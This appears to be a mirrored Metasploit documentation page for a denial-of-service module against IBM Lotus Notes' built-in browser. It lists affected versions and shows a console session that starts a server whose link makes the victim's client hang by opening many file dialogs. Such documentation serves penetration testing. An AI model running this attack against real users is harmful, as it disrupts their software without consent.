CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/auxiliary/dos/http/ibm_lotus_notes2.md
Views: 11789

Vulnerable Application

This module exploits a vulnerability in the built-in web-browser of IBM Lotus Notes client application.

If a user is persuaded to click on a malicious link, it would open up many file select dialog boxes which, would cause the client hang and have to be restarted.

Affected Products and Versions

IBM Notes 9.0.1 to 9.0.1 FP8 IF1 IBM Notes 9.0 to 9.0 IF4. IBM Notes 8.5.3 to 8.5.3 FP6 IF13. IBM Notes 8.5.2 to 8.5.2 FP4 IF3. IBM Notes 8.5.1. to 8.5.1 FP5 IF5. IBM Notes 8.5 release

Related security bulletin from IBM: http://www-01.ibm.com/support/docview.wss?uid=swg21999384

Verification Steps

Start msfconsole

use auxiliary/dos/http/ibm_lotus_notes2.rb

Set SRVHOST

Set SRVPORT

run (Server started) Visit server URL in the built-in web-browser of IBM Notes client application

Scenarios

msf > use auxiliary/dos/http/ibm_lotus_notes2 
msf auxiliary(ibm_lotus_notes2) > show options 

Module options (auxiliary/dos/http/ibm_lotus_notes2):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  


msf auxiliary(ibm_lotus_notes2) > set SRVHOST 192.168.0.50
SRVHOST => 192.168.0.50
msf auxiliary(ibm_lotus_notes2) > set SRVPORT 9092
SRVPORT => 9092
msf auxiliary(ibm_lotus_notes2) > run
[*] Auxiliary module execution completed
msf auxiliary(ibm_lotus_notes2) > 
[*] Using URL: http://192.168.0.50:9092/mypath
[*] Server started.
msf auxiliary(ibm_lotus_notes2) >

At this point, the target should use the built-in web browser of their IBM Lotus Notes client to navigate to the above "Using URL" value. And then they should see their Notes app become unresponsive.